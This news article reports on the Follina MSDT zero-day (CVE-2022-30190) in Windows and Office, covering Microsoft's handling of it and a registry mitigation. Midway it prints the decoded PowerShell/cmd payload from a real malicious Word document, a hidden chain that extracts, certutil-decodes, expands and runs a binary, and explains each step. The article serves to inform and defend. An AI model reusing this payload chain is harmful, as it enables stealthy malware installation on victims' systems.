A critical code execution zero-day in all supported versions of Windows has been under active exploit for seven weeks, giving attackers a reliable means for installing malware without triggering Windows Defender and a roster of other endpoint protection products.
The Microsoft Support Diagnostic Tool vulnerability was reported to Microsoft on April 12 as a zero-day that was already being exploited in the wild, researchers from Shadow Chaser Group said on Twitter. A response dated April 21, however, informed the researchers that the Microsoft Security Response Center team didn’t consider the reported behavior a security vulnerability because, supposedly, the MSDT diagnostic tool required a password before it would execute payloads.
Uh, nevermind
On Monday, Microsoft reversed course, identifying the behavior with the vulnerability tracker CVE-2022-30190 and warning for the first time that the reported behavior constituted a critical vulnerability after all.
“A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,” the advisory stated. “An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”
At the time of this story’s publication, Microsoft had yet to issue a patch. Instead, it was advising customers to disable the MSDT URL Protocol by:
- Run Command Prompt as Administrator.
- To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
- Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
Although initially missed by Microsoft, the vulnerability was again spotted when a researcher identified a Word document uploaded to VirusTotal on Friday that exploited the previously unknown attack vector.
According to analysis by researcher Kevin Beaumont, the document uses Word to retrieve an HTML file from a remote web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.
“That should not be possible,” Beaumont wrote.
Unfortunately, it is possible.
When the commands in the document are decoded, they translate to:
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
According to researcher John Hammond of security firm Huntress, the script:
- Starts hidden windows to:
- Kill msdt.exe if it is running
- Loop through files inside a RAR file, looking for a Base64 string for an encoded CAB file
- Store this Base64 encoded CAB file as 1.t
- Decode the Base64 encoded CAB file to be saved as 1.c
- Expand the 1.c CAB file into the current directory, and finally:
- Execute rgb.exe (presumably compressed inside the 1.c CAB file)
Beaumont also called attention to this academic paper, which in August 2020 showed how to use MSDT to execute code. That suggests that there was at least one other time the company’s security team failed to grasp the potential for this behavior to be maliciously exploited.
No, Protected View won’t save you
Normally, Word is set up to load content downloaded from the Internet in what’s known as protected view, a mode that disables macros and other potentially harmful functions. For reasons that aren’t clear, Beaumont said, if the document is loaded as a Rich Text Format file, it “runs without even opening the document (via the preview tab in Explorer) let alone Protected View.
In other words, Huntress researchers wrote, the RTF file can “trigger the invocation of this exploit with just the Preview Pane within Windows Explorer.” In so doing, “this extends the severity of this threat by not just ‘single-click’ to exploit, but potentially with a ‘zero-click’ trigger.”
Besides the document uploaded to VirusTotal on Friday, researchers uncovered a separate Word file uploaded on April 12 that exploits the same zero-day.
Given the severity of this unpatched vulnerability, organizations that rely on Microsoft Office should thoroughly investigate how it affects their networks. Disabling the MSDT URL Protocol isn’t likely to create major disruptions in the short run and possibly in the long run. While investigating—at least until Microsoft releases more details and guidance—Office users should turn the protocol off entirely and give any documents downloaded over the Internet additional scrutiny.